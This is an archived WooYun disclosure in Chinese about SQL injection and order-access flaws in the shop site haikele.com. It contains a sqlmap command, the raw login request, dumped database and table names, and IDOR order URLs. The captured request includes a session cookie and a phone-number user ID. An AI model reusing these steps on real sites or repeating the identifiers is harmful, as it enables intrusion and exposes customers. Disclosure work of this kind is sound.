乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-14: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-29: 厂商已经主动忽略漏洞,细节向公众公开
RT
http://www.haikele.com/yssfclist.aspx?Type=Ahttp://www.haikele.com/yssfclist.aspx?Taste=Ahttp://www.haikele.com/sfcwzlb.aspx?CategoryID=U post注入语法:sqlmap.py -r 3.txt --dbs--------------------post数据包----------------------POST /Login/CustomerLogin.aspx HTTP/1.1Host: www.haikele.comProxy-Connection: keep-aliveContent-Length: 138Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.haikele.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencodedReferer: http://www.haikele.com/Login/CustomerLogin.aspxAccept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=wehacuifp1bllptitzriqhg2; LXB_REFER=www.baidu.com; tencentSig=8241218560; HAIKELELOGIN=UserName=13656785601&UserId=214252&AvatarFile=; ProductCookie=sysNos=48013,48013,39196,39196; _gat=1; EntLibCartCookie=cart=00A8BA1CC67CA331; EntLibGiftCookie=gift=00A8BA1CC67CA331; Hm_lvt_bbb3472a2e37b94736cc95fc663ca69f=1460574967; Hm_lpvt_bbb3472a2e37b94736cc95fc663ca69f=1460581837; _ga=GA1.2.1670466567.1460574967__VIEWSTATE=%2FwEPDwUJNDc2NzE5NzM3ZGQ%3D&ctl00%24Body%24txtUid=wooyun&ctl00%24Body%24txtPwd=123123&ctl00%24Body%24btnLogin=%B5%C7+++%C2%BC
数据库信息
available databases [9]:[*] back[*] bak20141212[*] EntLibShopping[*] master[*] model[*] msdb[*] t[*] tempdb[*] TMDB
表信息
Database: EntLibShopping+------------------------------------+---------+| Table | Entries |+------------------------------------+---------+| dbo.INVT_INVT_WBA | 1062297 || dbo.Ent_Sys_Log | 303966 || dbo.zvw_report_traceqtydetail | 219857 || dbo.Ent_Customer_Sequence | 214252 || dbo.PACK_CARD_ORDER_ITEM | 197411 || dbo.PACK_CARD_ORDER_ITEM | 197411 || dbo.zvw_report_posqtydetail | 173719 || dbo.Ent_Hi_Log | 139023 || dbo.zvw_report_orderqtydetail | 128295 || dbo.Ent_SO_Item_Backup | 122000 || dbo.Ent_SO_Item_Backup | 122000 || dbo.vw_report_shortage_detail | 118369 || dbo.ztb_deliverycert_list | 116768 || dbo.vw_report_saleexcept_detail | 103239 || dbo.Ent_SignIn_Hi | 95681 || dbo.Ent_Search_Keywords | 91203 || dbo.PACK_PRODUCT_SUPPLY | 48064 || dbo.Ent_Product_Sequence | 44794 || dbo.Ent_integral_log | 31824 || dbo.Ent_integral_log | 31824 || dbo.PACK_TEMPLATE_PLAN_ITEM | 30876 || dbo.vw_report_lockexcept_detail_v2 | 29744 || dbo.vw_report_lockexcept_detail_v2 | 29744 || dbo.PACK_CARD_ORDER_MASTER | 25670 || dbo.Ent_Comment | 23669 || dbo.Ent_SO_Master_Backup | 22739 || dbo.Ent_SO_Master_Backup | 22739 || dbo.Ent_AccountRecharge | 20320 || dbo.View_Customer_List | 19482 || dbo.Review | 12439 || dbo.View_ztb_deliverycert_detail | 12125 || dbo.Ent_ShipAddress | 10974 || dbo.Ent_Product_Pics | 10064 || dbo.View_Comment_List | 9885 || dbo.Ent_Product_Price | 9403 || dbo.Ent_VendorLog | 8396 || dbo.Ent_Product_TempQuantity | 5961 || dbo.vw_report_zongzi_order_detail | 4126 || dbo.Ent_SO_Master_Repeat | 3533 || dbo.Ent_Inventory_Stock | 3492 || dbo.Ent_Inventory_Stock | 3492 || dbo.Ent_Product_Status | 3381 || dbo.Ent_Area_Sequence | 3364 || dbo.Ent_Area_Sequence | 3364 || dbo.PACK_TEMPLATE_PLAN_MASTER | 3216 || dbo.Ent_Manufacturer_Sequence | 2468 || dbo.Ent_Manufacturer_Sequence | 2468 || dbo.Ent_CMS_Blog | 2340 || dbo.Ent_ShipType_Area_Un | 2269 || dbo.Ent_PhoneUP | 2202 || dbo.Ent_Recharge_log | 2195 || dbo.PACK_CARD_RULE | 1865 || dbo.Ent_SO_Sequence | 1708 || dbo.Ent_YiYuanGou | 1646 || dbo.T_District | 949 || dbo.View_ProductList | 828 || dbo.PACK_PRODUCT_CLASS | 614 || dbo.Ent_Sys_Role_Privilege | 605 || dbo.Ent_Sys_Role_Privilege | 605 || dbo.Ent_PO_Item | 524 || dbo.Ent_Sys_Sequence | 473 || dbo.[Ent_CMS_Menu-bad] | 455 || dbo.[Ent_CMS_Menu-bad] | 455 || dbo.Ent_Product_DailyClickTrend | 441 || dbo.Ent_Product_SaleTrend | 437 || dbo.Ent_Promotion_Rule | 435 || dbo.Ent_Product_LastPOInfo | 391 || dbo.vw_report_abortexcept_detail | 387 || dbo.View_AccountRecharge_detail | 352 || dbo.Ent_SO_ValueAdded_Invoice | 337 || dbo.ztb_deliverycert_type | 293 || dbo.Ent_Finance_SOIncome | 265 || dbo.Ent_Sys_User_Role | 235 || dbo.T_City | 195 || dbo.Ent_Sys_Privilege | 175 || dbo.Ent_Category_Sequence | 166 || dbo.Ent_Product_Remark | 159 || dbo.Ent_ProductCategory | 121 || dbo.Ent_Category2 | 120 || dbo.Ent_Sale_PointDelay | 107 || dbo.Ent_Customer_PointLog | 98 || dbo.Ent_Customer_PointLog | 98 || dbo.view_ProductCategory_list | 90 || dbo.view_ProductCategory_list | 90 || dbo.View_ProductCategoryList | 90 || dbo.Ent_AsyncEmail | 86 || dbo.Ent_Category_Customized | 79 || dbo.Ent_PO_Sequence | 75 || dbo.Ent_PO_Master | 74 || dbo.Ent_ShipType_Area_Price | 68 || dbo.Ent_ShipType_Area_Price | 68 || dbo.Seo_head | 61 || dbo.Ent_Category_Attribute | 60 || dbo.Ent_SaleAdvertisementItem | 58 || dbo.Ent_SaleAdvertisementItem | 58 || dbo.Ent_SendPromotion_Log | 56 || dbo.Ent_Product_DailyClick | 52 || dbo.Ent_SearchKeyword | 43 || dbo.PACK_PACK_CLASS | 40 || dbo.PACK_PACK_CLASS | 40 || dbo.Ent_St_Adjust_Item | 30 || dbo.Ent_St_Adjust_Item | 30 || dbo.T_Province | 29 || dbo.ztb_deliverycert_Exchange | 28 || dbo.Ent_SaleRule_Item | 26 || dbo.Ent_Category1 | 25 || dbo.Ent_ShipType_Sequence | 25 || dbo.Ent_St_Adjust_Sequence | 25 || dbo.Ent_TaoBao | 25 || dbo.Ent_PayType_Sequence | 22 || dbo.Ent_PayType_Sequence | 22 || dbo.Ent_Package_Offers | 17 || dbo.Ent_PO_Apportion_Subject | 17 || dbo.Ent_Vendor_Sequence | 16 || dbo.Ent_Vendor_Sequence | 16 || dbo.Ent_News | 11 || dbo.Ent_Poll_Item | 11 || dbo.Ent_Poll_Item | 11 || dbo.Ent_SaleRule_Master | 11 || dbo.Ent_St_Virtual | 11 || dbo.Ent_Promotion_Code_Sequence | 10 || dbo.Ent_Promotion_Code_Sequence | 10 || dbo.zvw_deliverystore_list | 10 || dbo.Ent_Stock_Join | 9 || dbo.Ent_Stock_Join | 9 || dbo.Ent_OnlineListArea | 8 || dbo.Ent_OnlineListArea | 8 || dbo.Ent_ShipType_PayType_Un | 8 || dbo.Ent_Sys_User_FavoriteLink | 8 || dbo.Ent_Sys_User_FavoriteLink | 8 || dbo.Ent_Finance_POPay_Item | 7 || dbo.Ent_Finance_POPay_Item | 7 || dbo.Ent_St_Transfer_Item | 7 || dbo.Ent_St_Transfer_Item | 7 || dbo.Ent_Supplie | 7 || dbo.Ent_Product_Question | 6 || dbo.Ent_St_Transfer_Sequence | 5 || dbo.Ent_WishList | 5 || dbo.Ent_Cs_log | 4 || dbo.Ent_Cs_log | 4 || dbo.Ent_PO_Basket | 4 || dbo.Ent_Product_Related | 4 || dbo.Ent_Product_Sale | 4 || dbo.Ent_Sys_Sync | 4 || dbo.T_Type | 4 || dbo.ztb_deliverycert_status | 4 || dbo.Ent_Product_Notify | 3 || dbo.Ent_RMA_OutBound_Item | 3 || dbo.Ent_RMA_OutBound_Item | 3 || dbo.Ent_RMA_Register_Sequence | 3 || dbo.Ent_RMA_Register_Sequence | 3 || dbo.Ent_RMA_Request_Item | 3 || dbo.Ent_RMA_Request_Item | 3 || dbo.Ent_RMA_Request_Sequence | 3 || dbo.Ent_Feedback | 2 || dbo.Ent_Finance_NetPay | 2 || dbo.Ent_RMA_OutBound_Sequence | 2 || dbo.Ent_RMA_Revert_Item | 2 || dbo.Ent_RMA_Revert_Item | 2 || dbo.Ent_RMA_Revert_Sequence | 2 || dbo.Ent_Settings | 2 || dbo.Ent_St_Lend_Item | 2 || dbo.Ent_St_Lend_Item | 2 || dbo.Ent_St_Lend_Return | 2 || dbo.Ent_Sys_Configuration | 2 || dbo.UserPointLevel | 2 || dbo.Ent_FriendLink | 1 || dbo.Ent_LinkSource_ReportColumn | 1 || dbo.Ent_LinkSource_ReportColumn | 1 || dbo.Ent_Promotion_Customer | 1 || dbo.Ent_Promotion_Limit | 1 || dbo.Ent_Promotion_Master_Sequence | 1 || dbo.Ent_Promotion_Master_Sequence | 1 || dbo.Ent_Recommend | 1 || dbo.Ent_RMA_Refund_Item | 1 || dbo.Ent_RMA_Refund_Item | 1 || dbo.Ent_RMA_Refund_Sequence | 1 || dbo.Ent_RMA_Return_Item | 1 || dbo.Ent_RMA_Return_Item | 1 || dbo.Ent_RMA_Return_Sequence | 1 || dbo.Ent_Sale_CountDown | 1 || dbo.Ent_Sale_CountGift | 1 || dbo.Ent_St_Lend_Sequence | 1 || dbo.Ent_St_Shift_Item | 1 || dbo.Ent_St_Shift_Item | 1 || dbo.Ent_St_Shift_Sequence | 1 || dbo.PACK_CARD_SEASON | 1 |+------------------------------------+---------+
下面800多个表 贴出部分信息
Database: TMDB[807 tables]+---------------------------------------------+| ACTIONSERIES || AP_PAYMENT_APPLY || ARHASTENENTERTAIN || AR_AR_GA_tmp || AR_AR_GA_tmp || AR_AR_WBA_tmp || AR_AR_WBA_tmp || AR_FAR_GA || AR_FAR_WBA || AR_RACCT_GA || AR_RACCT_WBA || AR_yingshou_v || AccountsPopedom || Aux_IMEICODE || BATCH_FORM_BD || BATCH_FORM_HD || BBS1 || BILLCONTENTCONFIGURE || BILLCONTENTRECORD || BILLCONTENTTABLE || BILLCONTENTTABLEST || BOXST || BOXUPHEAD || BOXUPST || BPMCONTENT || BPMFLOW || BPMMAIN || BSC_EVAL_BD || BSC_EVAL_HD || BSC_INI || BranchPost || CAIGOU1 || CB_ACTIONATTRIBUTE || CB_ACTIONBUSINESS || CB_ACTIONSERIES2 || CB_ACTIONSERIES2 || CB_ACTIONSERIESDOING || CB_ACTIONSERIESLAST || CB_ACTIONSERIESLOG || CB_BILLCONFIGUREBD || CB_BILLCONFIGUREHD || CB_COMTB || CB_PLANTB || CB_SERVICECHECK || CB_zBak_20100326_161840_201004_AR_AR_GA || CB_zBak_20100326_161840_201004_Invt_Invt_GA || COMPREVDATE || COMTB || CX_RYKC || C_ACCOUNTSPOPEDOM || C_ACCOUNTS_PERMISSIONS || C_ACCOUNTS_ROLEPERMISSIONS || C_AUDITCFG || C_BDTOHD || C_BFACCTCFG || C_BILLRULESERIES || C_BUTTONCFG || C_CHOOSEBILL || C_COMBOCFG || C_COMBOUION || C_COMMONCXFORM || C_COMMONCXFORM || C_COMMONPRINTCLICK || C_COMMONPRINTCLICK || C_COMMONPRINTFSET || C_COMMONPRINTFSETUSER || C_COMMONPRINTMULTITEMPLATE || C_COMMONPRINTSET || C_COMMONPRINTSET || C_COMMONRS |
这边越权查看任意订单信息
http://www.haikele.com/MyAccount/MyOrderDetail.aspx?soSysNo=34996
http://www.haikele.com/MyAccount/MyOrderDetail.aspx?soSysNo=34995
还有一处是收货信息任意改修改处抓包
这个
之前177这个号
修改包
成功添加一个
过滤 加验证 你懂得
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
